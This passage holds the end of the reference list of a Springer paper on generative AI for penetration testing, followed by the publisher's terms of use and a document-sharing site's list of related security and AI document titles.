cyber-resilience-against-offensive-ai/?sh=775c8fa08ed0 (2023) Accessed 4 Jun 2023
4. AttackIQ AttackIQ Ready!. https://www.attackiq.com/platform/ 21. Jayanth Mission-Pumpkin v1.0: PumpkinFestival. https://www.
attackiq-ready (2023) Accessed 2 May 2023 vulnhub.com/entry/mission-pumpkin-v10-pumpkinfestival,329/
5. Avgerinos, T., Brumley, D., Davis, J., Goulden, R., Nighswander, (2019) Accessed 4 May 2023
T., Rebert, A., Williamson, N.: The Mayhem cyber reasoning sys- 22. Khan, S., Kabanov, I., Hua, Y., Madnick, S.: A systematic analysis
tem. IEEE Secur. Priv. 16, 52–60 (2018). https://doi.org/10.1109/ of the capital one data breach: critical lessons learned. ACM Trans.
msp.2018.1870873 Priv. Secur. (2022). https://doi.org/10.1145/3546068
6. Ben-Moshe, S., Gekker, G., Cohen, G.: OpwnAI: AI That Can Save 23. Mansfield-Devine, S.: Weaponising ChatGPT. Netw. Secur. (2023)
the Day or HACK it Away—Check Point Research. Check Point 24. McDaniel, L., Talvi, E., Hay, B.: Capture the flag as cyber security
Research (2023) https://research.checkpoint.com/2022/opwnai- introduction. In: 2016 49th Hawaii International Conference On
ai-that-can-save-the-day-or-hack-it-away System Sciences (HICSS), pp. 5479–5486 (2016)
7. BlackBerry Ltd ChatGPT May Already Be Used in Nation 25. Microsoft Microsoft and OpenAI extend partner-
State Cyberattacks, Say IT Decision Makers in BlackBerry ship. https://blogs.microsoft.com/blog/2023/01/23/
Global Research. https://www.blackberry.com/us/en/company/ microsoftandopenaiextendpartnership (2023) Accessed 4 May
newsroom/press-releases/2023/chatgpt-may-already-be-used-in- 2023
nation-state-cyberattacks-say-it-decision-makers-in-blackberry- 26. Montalbano, E.: ChatGPT Hallucinations Open Developers to Sup-
global-research (2023) Accessed 4 May 2023 ply Chain Malware Attacks. Dark Reading. (2023) https://www.
8. Chen, J., Hu, S., Zheng, H., Xing, C., Zhang, G.: GAIL-PT: an darkreading.com/application-security/chatgpt-hallucinations-
intelligent penetration testing framework with generative adver- developers-supply-chain-malware-attacks
sarial imitation learning. Comput. Secur. 126, 103055 (2023) 27. Morpheuslord GPT_Vuln-analyzer. https://github.com/
9. Cunningham, A.: Microsoft could offer private ChatGPT morpheuslord/GPT_Vuln-analyzer (2023) Accessed 4 May
to businesses for “10 times” the normal cost. Ars Technica 2023
https://arstechnica.com/information-technology/2023/05/report- 28. Offensive Security Get Kali | Kali Linux. https://www.kali.org/get-
microsoft-plans-privacy-first-chatgpt-for-businesses-with- kali/#kali-virtual-machines (2023) Accessed 4 Jun 2023
secrets-to-keep (2023) Accessed 4 May 2023 29. OpenAI ChatGPT - Release Notes. https://help.openai.com/en/
10. CyCraft Technology Corp CyCraft’s Fuchikoma at Code Blue articles/6825453-chatgpt-release-notes (2023) Accessed 14 Oct
2019: The Modern-Day Ghost in the Shell - CyCraft. https:// 2023
cycraft.com/cycrafts-fuchikoma-at-code-blue-2019-the-modern- 30. OpenAI OpenAI and Microsoft extend partnership. https://openai.
day-ghost-in-the-shell (2019) Accessed 2 May 2023 com/blog/openai-and-microsoft-extend-partnership (2023)
11. CyCraft Technology Corp How to Train a Machine Learn- Accessed 4 May 2023
ing Model to Defeat APT Cyber Attacks, Part 2: Fuchikoma 31. OpenAI Usage policies. https://openai.com/policies/usage-
VS CyAPTEmu—The Weigh-In. (2020) https://medium. policies (2023) Accessed 4 May 2023
com/@cycraft_corp/how-to-train-a-machine-learning-model- 32. Papernot, N., McDaniel, P., Goodfellow, I., Jha, S., Celik, Z.,
to-defeat-apt-cyber-attacks-part-2-fuchikoma-vs-cyaptemu- Swami, A.: Practical black-box attacks against machine learning.
f689a5df5541 In: Proceedings Of The 2017 ACM On Asia Conference on Com-
12. Deng, G.: PentestGPT. (2023) https://github.com/GreyDGL/ puter and Communications Security, pp. 506–519 (2017)
PentestGPT 33. Petro, D., Morris, B.: Weaponizing machine learning: Humanity
13. Europol The criminal use of ChatGPT—a cautionary tale was overrated anyway. DEF CON, vol 25 (2017)
about large language models | Europol. https://www.europol. 34. Prasad, S., Sharmila, V., Badrinarayanan, M. Role of Artificial
europa.eu/media-press/newsroom/news/criminal-use-of-chatgpt- Intelligence based Chat Generative Pre-trained Transformer (Chat-
cautionary-tale-about-large-language-models (2023) Accessed 4 GPT) in Cyber Security. In: 2023 2nd International Conference on
May 2023 Applied Artificial Intelligence and Computing (ICAAIC), pp. 107–
14. Gal, U.: ChatGPT is a data privacy nightmare. https:// 114 (2023)
theconversation.com/chatgpt-is-a-data-privacy-nightmare-if- 35. Renaud, K., Warkentin, M., Westerman, G.: From ChatGPT to
youve-ever-posted-online-you-ought-to-be-concerned-199283 HackGPT: Meeting the Cybersecurity Threat of Generative AI.
(2023) Accessed 4 May 2023 MIT Sloan Management Review (2023)
15. Grbic, D., Dujlovic, I.: Social engineering with ChatGPT. In: 22nd 36. Sanjaya, I., Sasmita, G., Arsa, D.: Information technology risk
International Symposium INFOTEH-JAHORINA (INFOTEH), management using ISO 31000 based on ISSAF framework pen-
pp. 1–5 (2023) etration testing (Case Study: Election Commission of X City). Int.
16. Greshake, K., Abdelnabi, S., Mishra, S., Endres, C., Holz, T., J. Comput. Netw. Inf. Secur. 12 (2020)
Fritz, M.: More than you’ve asked for: A Comprehensive Anal- 37. Scherb, C., Heitz, L., Grimberg, F., Grieder, H., Maurer, M.: A
ysis of Novel Prompt Injection Threats to Application-Integrated serious game for simulating cyberattacks to teach cybersecurity.
Large Language Models. (2023). https://ui.adsabs.harvard.edu/ ArXiv:2305.03062. (2023)
abs/2023arXiv230212173G 38. Shimony, E., Tsarfati, O.: Chatting Our Way Into Creating a Poly-
17. Gupta, M., Akiri, C., Aryal, K., Parker, E., Praharaj, L.: From Chat- morphic Malware. https://www.cyberark.com/resources/threat-
GPT to ThreatGPT: Impact of generative AI in cybersecurity and research-blog/chatting-our-way-into-creating-a-polymorphic-
privacy. IEEE Access. (2023) malware (2023) Accessed 4 May 2023
18. Gurman, M.: Samsung Bans Staff’s AI Use After Spotting Chat- 39. Siemens Energy DeepArmor®Industrial. https://assets.siemens-
GPT Data Leak. Bloomberg. (2023) https://www.bloomberg.com/ energy.com/siemens/assets/api/uuid:48023aeb-6592-46ae-
news/articles/2023-05-02/samsung-bans-chatgpt-and-other- bf7c-0353c0653fe6/siemensenergycybersecuritybrochure-
generative-ai-use-by-staff-after-leak#xj4y7vzkg

123

Content courtesy of Springer Nature, terms of use apply. Rights reserved.

Generative AI for pentesting: the good, the bad, the ugly 2097

deeparmour-industrial210429.pdf (2023) Accessed 2 May 44. Zacharakos, A.: How hackers can abuse ChatGPT to create mal-
2023 ware. Security. (2023) https://www.techtarget.com/searchsecurity/
40. Significant-Gravitas Auto-GPT. https://github.com/Significant- news/365531559/How-hackers-can-abuse-ChatGPT-to-create-
Gravitas/Auto-GPT (2023)Accessed 4 Jun 2023 malware
41. Takaesu, I.: Deepexploit: Fully automatic penetration test tool 45. Zhuo, T., Huang, Y., Chen, C., Xing, Z.: Exploring ai ethics of
using machine learning. BlackHat (2018) chatgpt: a diagnostic analysis. ArXiv:2301.12867. (2023)
42. Temara, S.: Maximizing Penetration Testing Success with Effec-
tive Reconnaissance Techniques using ChatGPT. Research Square
Platform LLC https://doi.org/10.21203/rs.3.rs-2707376/v1 (2023)
Publisher’s Note Springer Nature remains neutral with regard to juris-
Accessed 4 Jun 2023
dictional claims in published maps and institutional affiliations.
43. TheR1D ShellGPT. https://github.com/TheR1D/shell_gpt (2023)
Accessed 4 May 2023

123

Content courtesy of Springer Nature, terms of use apply. Rights reserved.

Terms and Conditions
Springer Nature journal content, brought to you courtesy of Springer Nature Customer Service Center GmbH (“Springer Nature”).
Springer Nature supports a reasonable amount of sharing of research papers by authors, subscribers and authorised users (“Users”), for small-
scale personal, non-commercial use provided that all copyright, trade and service marks and other proprietary notices are maintained. By
accessing, sharing, receiving or otherwise using the Springer Nature journal content you agree to these terms of use (“Terms”). For these
purposes, Springer Nature considers academic use (by researchers and students) to be non-commercial.
These Terms are supplementary and will apply in addition to any applicable website terms and conditions, a relevant site licence or a personal
subscription. These Terms will prevail over any conflict or ambiguity with regards to the relevant terms, a site licence or a personal subscription
(to the extent of the conflict or ambiguity only). For Creative Commons-licensed articles, the terms of the Creative Commons license used will
apply.
We collect and use personal data to provide access to the Springer Nature journal content. We may also use these personal data internally within
ResearchGate and Springer Nature and as agreed share it, in an anonymised way, for purposes of tracking, analysis and reporting. We will not
otherwise disclose your personal data outside the ResearchGate or the Springer Nature group of companies unless we have your permission as
detailed in the Privacy Policy.
While Users may use the Springer Nature journal content for small scale, personal non-commercial use, it is important to note that Users may
not:

1. use such content for the purpose of providing other users with access on a regular or large scale basis or as a means to circumvent access
control;
2. use such content where to do so would be considered a criminal or statutory offence in any jurisdiction, or gives rise to civil liability, or is
otherwise unlawful;
3. falsely or misleadingly imply or suggest endorsement, approval , sponsorship, or association unless explicitly agreed to by Springer Nature in
writing;
4. use bots or other automated methods to access the content or redirect messages
5. override any security feature or exclusionary protocol; or
6. share the content in order to create substitute for Springer Nature products or services or a systematic database of Springer Nature journal
content.
In line with the restriction against commercial use, Springer Nature does not permit the creation of a product or service that creates revenue,
royalties, rent or income from our content or its inclusion as part of a paid for service or for other commercial gain. Springer Nature journal
content cannot be used for inter-library loans and librarians may not upload Springer Nature journal content on a large scale into their, or any
other, institutional repository.
These terms of use are reviewed regularly and may be amended at any time. Springer Nature is not obligated to publish any information or
content on this website and may remove it or features or functionality at our sole discretion, at any time with or without notice. Springer Nature
may revoke this licence to you at any time and remove access to any copies of the Springer Nature journal content which have been saved.
To the fullest extent permitted by law, Springer Nature makes no warranties, representations or guarantees to Users, either express or implied
with respect to the Springer nature journal content and all parties disclaim and waive any implied warranties or warranties imposed by law,
including merchantability or fitness for any particular purpose.
Please note that these rights do not automatically extend to content, data or other material published by Springer Nature that may be licensed
from third parties.
If you would like to use or distribute our Springer Nature journal content to a wider audience or on a regular basis or in any other manner not
expressly permitted by these Terms, please contact Springer Nature at

[email protected]

Large Language Models- A Deep Dive
100% (4)
Large Language Models- A Deep Dive
496 pages
1Z0_1122_25_Oracle_Cloud_Infrastructure_2025_AI_Foundations_Associate
No ratings yet
1Z0_1122_25_Oracle_Cloud_Infrastructure_2025_AI_Foundations_Associate
83 pages
berryman
No ratings yet
berryman
24 pages
OSDA Exam Report Template OS v1
100% (1)
OSDA Exam Report Template OS v1
8 pages
Generative AI Checklist
100% (1)
Generative AI Checklist
10 pages
Specterops
No ratings yet
Specterops
552 pages
CPENTbrochure
No ratings yet
CPENTbrochure
9 pages
Hackercool - May 2020
No ratings yet
Hackercool - May 2020
75 pages
Burpsuite For Pentester - Autorize
No ratings yet
Burpsuite For Pentester - Autorize
23 pages
maltego ppt
100% (1)
maltego ppt
12 pages
Web Data Extractors
No ratings yet
Web Data Extractors
26 pages
Web Application Hacking Penetration Testing 5 Day Hands On Course Syllabus v2.0 New
No ratings yet
Web Application Hacking Penetration Testing 5 Day Hands On Course Syllabus v2.0 New
8 pages
Professional Ethical Hacker Course Outline: Module 00 - Setup Lab
No ratings yet
Professional Ethical Hacker Course Outline: Module 00 - Setup Lab
10 pages
Web Penetration Testing Roadmap (1)
No ratings yet
Web Penetration Testing Roadmap (1)
11 pages
Information Gathering Tools
No ratings yet
Information Gathering Tools
12 pages
Open Source Forensics Tools
No ratings yet
Open Source Forensics Tools
131 pages
OPSEC Fundamentals For Remote Red Teams
No ratings yet
OPSEC Fundamentals For Remote Red Teams
64 pages
Chapter 02 - Information Gathering - Handout
No ratings yet
Chapter 02 - Information Gathering - Handout
104 pages
Malware Analysis 1
No ratings yet
Malware Analysis 1
20 pages
Towards Pentesting Automation Using The Metasploit Framework
No ratings yet
Towards Pentesting Automation Using The Metasploit Framework
8 pages
PenTest 1 PDF
No ratings yet
PenTest 1 PDF
5 pages
Pwning ADCS
No ratings yet
Pwning ADCS
38 pages
Hiding Windows
No ratings yet
Hiding Windows
27 pages
FCIS-Book-Testing-Report
No ratings yet
FCIS-Book-Testing-Report
43 pages
Osintgram : Osintgram Is A OSINT Tool On Instagram To Collect, Analyze, and Run Reconnaissance
No ratings yet
Osintgram : Osintgram Is A OSINT Tool On Instagram To Collect, Analyze, and Run Reconnaissance
5 pages
40 Vulnerabilities in 40 Day Ebook
No ratings yet
40 Vulnerabilities in 40 Day Ebook
27 pages
Exploitmag 01 2012
No ratings yet
Exploitmag 01 2012
36 pages
Burp Suite Cheat Sheet by Codelivly
No ratings yet
Burp Suite Cheat Sheet by Codelivly
5 pages
Devsecops Maturity Model
No ratings yet
Devsecops Maturity Model
29 pages
Cracking Social Media
No ratings yet
Cracking Social Media
11 pages
Chapter 10 Vulnerability Assessment and Data Security
No ratings yet
Chapter 10 Vulnerability Assessment and Data Security
6 pages
Roadmap
No ratings yet
Roadmap
13 pages
Cyber Security Penetration Testing Activity v2
No ratings yet
Cyber Security Penetration Testing Activity v2
10 pages
Pentest-Report Fdroid PDF
No ratings yet
Pentest-Report Fdroid PDF
17 pages
Hakin9 en TBO 01 2014 Teaser
100% (4)
Hakin9 en TBO 01 2014 Teaser
76 pages
Red Teaming
No ratings yet
Red Teaming
16 pages
Burp Suite
No ratings yet
Burp Suite
174 pages
RedSiege Sample Report 2024
No ratings yet
RedSiege Sample Report 2024
57 pages
Bwapp Training
No ratings yet
Bwapp Training
27 pages
Penetration Testing Tools
No ratings yet
Penetration Testing Tools
1 page
Financial Entities Ethical Red Teaming Framework
No ratings yet
Financial Entities Ethical Red Teaming Framework
28 pages
Kumar 2017
No ratings yet
Kumar 2017
5 pages
CSCI369 Lab 3
No ratings yet
CSCI369 Lab 3
4 pages
Malware Analysis
No ratings yet
Malware Analysis
35 pages
Building A Node - Js Application On Android - Part 1:termux, Vim Andnode - Js
No ratings yet
Building A Node - Js Application On Android - Part 1:termux, Vim Andnode - Js
6 pages
The Ethical Osint Spymaster Guidebook STANDARD
No ratings yet
The Ethical Osint Spymaster Guidebook STANDARD
136 pages
BWAPP Training
100% (1)
BWAPP Training
30 pages
(@CyberBankSa) - eCXD Labs
No ratings yet
(@CyberBankSa) - eCXD Labs
286 pages
Attacked From Behind Application PDF
No ratings yet
Attacked From Behind Application PDF
24 pages
Think Like A Criminal
No ratings yet
Think Like A Criminal
10 pages
Coverity Security Report Pttep Bankguarantee - Snid 39617
100% (1)
Coverity Security Report Pttep Bankguarantee - Snid 39617
17 pages
Android Pentest Course - 231111 - 234710
No ratings yet
Android Pentest Course - 231111 - 234710
7 pages
SQLi Cheatsheet
No ratings yet
SQLi Cheatsheet
14 pages
Topic 4 - Cyber Crime Ecosystem - DR Ram Kumar G
No ratings yet
Topic 4 - Cyber Crime Ecosystem - DR Ram Kumar G
60 pages
The Bug Hunters Methodology 2
No ratings yet
The Bug Hunters Methodology 2
57 pages
AD Study Guide 1690881837
No ratings yet
AD Study Guide 1690881837
9 pages
Linux Privilege Escalation SSH KEY
No ratings yet
Linux Privilege Escalation SSH KEY
3 pages
Evade
No ratings yet
Evade
20 pages
Evaluationof Web Vulnerability Scanners Basedon OWASPBenchmark
No ratings yet
Evaluationof Web Vulnerability Scanners Basedon OWASPBenchmark
7 pages
Cloud Pentesting Cheatsheet
No ratings yet
Cloud Pentesting Cheatsheet
21 pages
(Ebook) Extreme Privacy: What It Takes to Disappear by Michael Bazzell ISBN 9788729419396, 9798729419395, 8729419395 - The full ebook version is available, download now to explore
100% (2)
(Ebook) Extreme Privacy: What It Takes to Disappear by Michael Bazzell ISBN 9788729419396, 9798729419395, 8729419395 - The full ebook version is available, download now to explore
82 pages
Intrusion detection system Standard Requirements
From Everand
Intrusion detection system Standard Requirements
Gerardus Blokdyk
No ratings yet
Certified Ethical Hacker C.E.H v11 Exam Prep And Dumps
From Everand
Certified Ethical Hacker C.E.H v11 Exam Prep And Dumps
Byte Books
No ratings yet
Ultimate Ethical Hacking Boot Camp Beginner to Pro
From Everand
Ultimate Ethical Hacking Boot Camp Beginner to Pro
Gradient Publication
No ratings yet
Breaches Anticipated in 2024
No ratings yet
Breaches Anticipated in 2024
175 pages
Ghafir Future Generation Computer Systems
No ratings yet
Ghafir Future Generation Computer Systems
42 pages
Advanced Persistent Threat Incident
No ratings yet
Advanced Persistent Threat Incident
14 pages
Article Cloud Storage Defense Against Advanced Persistent
No ratings yet
Article Cloud Storage Defense Against Advanced Persistent
12 pages
Article APT
No ratings yet
Article APT
24 pages
Aricle-Towards A Framework To Detect Multi-Stage
No ratings yet
Aricle-Towards A Framework To Detect Multi-Stage
6 pages
Atc-2013 Apt
No ratings yet
Atc-2013 Apt
9 pages
Infocom15 Pengfei
No ratings yet
Infocom15 Pengfei
10 pages
BS Art 50268-10
No ratings yet
BS Art 50268-10
8 pages
3160_Wolf_Accurate_Video_Capti
No ratings yet
3160_Wolf_Accurate_Video_Capti
12 pages
AI-Tool-development-using-Python-Django-Syllabus
100% (1)
AI-Tool-development-using-Python-Django-Syllabus
2 pages
MCP Beginners Guide v2
No ratings yet
MCP Beginners Guide v2
62 pages
Major Project Report Part -1 (2)
No ratings yet
Major Project Report Part -1 (2)
14 pages
5_Automated legal consulting in construction procurement using metaheuristically optimized large language models
No ratings yet
5_Automated legal consulting in construction procurement using metaheuristically optimized large language models
11 pages
2406.08426v3
No ratings yet
2406.08426v3
18 pages
Lionbridge 2023 Machine Translation Report Whitepaper
No ratings yet
Lionbridge 2023 Machine Translation Report Whitepaper
36 pages
BERT4ST-windpowerforecast
No ratings yet
BERT4ST-windpowerforecast
11 pages
MCS-SQL: Leveraging Multiple Prompts and Multiple-Choice Selection For Text-to-SQL Generation
No ratings yet
MCS-SQL: Leveraging Multiple Prompts and Multiple-Choice Selection For Text-to-SQL Generation
17 pages
An Overview of Diffusion Models: Applications, Guided Generation, Statistical Rates and Optimization
No ratings yet
An Overview of Diffusion Models: Applications, Guided Generation, Statistical Rates and Optimization
39 pages
2503.09567v3
No ratings yet
2503.09567v3
93 pages
Ai Drive - Prompt Library
No ratings yet
Ai Drive - Prompt Library
4 pages
Now Assist Insights
No ratings yet
Now Assist Insights
4 pages
Experian-GenAI-Report-1
No ratings yet
Experian-GenAI-Report-1
14 pages
2024 Schoenegger Et Al LLM Augmentation-1
No ratings yet
2024 Schoenegger Et Al LLM Augmentation-1
18 pages
Introduction.to.KAG-en-tc-20241111
No ratings yet
Introduction.to.KAG-en-tc-20241111
26 pages
First Review Ppt
No ratings yet
First Review Ppt
19 pages
Prompt Engineering 2
No ratings yet
Prompt Engineering 2
6 pages
GB 350HL1Rev1
No ratings yet
GB 350HL1Rev1
12 pages
(1755) why you suck at prompt engineering (and how to fix it) - YouTube (2)
No ratings yet
(1755) why you suck at prompt engineering (and how to fix it) - YouTube (2)
21 pages
LSH
No ratings yet
LSH
11 pages
s10115-024-02120-8
No ratings yet
s10115-024-02120-8
24 pages
csaszar-et-al-2024-artificial-intelligence-and-strategic-decision-making-evidence-from-entrepreneurs-and-investors
No ratings yet
csaszar-et-al-2024-artificial-intelligence-and-strategic-decision-making-evidence-from-entrepreneurs-and-investors
25 pages
Development of a Preliminary Patient Safety Classification System for Generative AI
No ratings yet
Development of a Preliminary Patient Safety Classification System for Generative AI
3 pages
Explainability For Large Language Models: A Survey
No ratings yet
Explainability For Large Language Models: A Survey
31 pages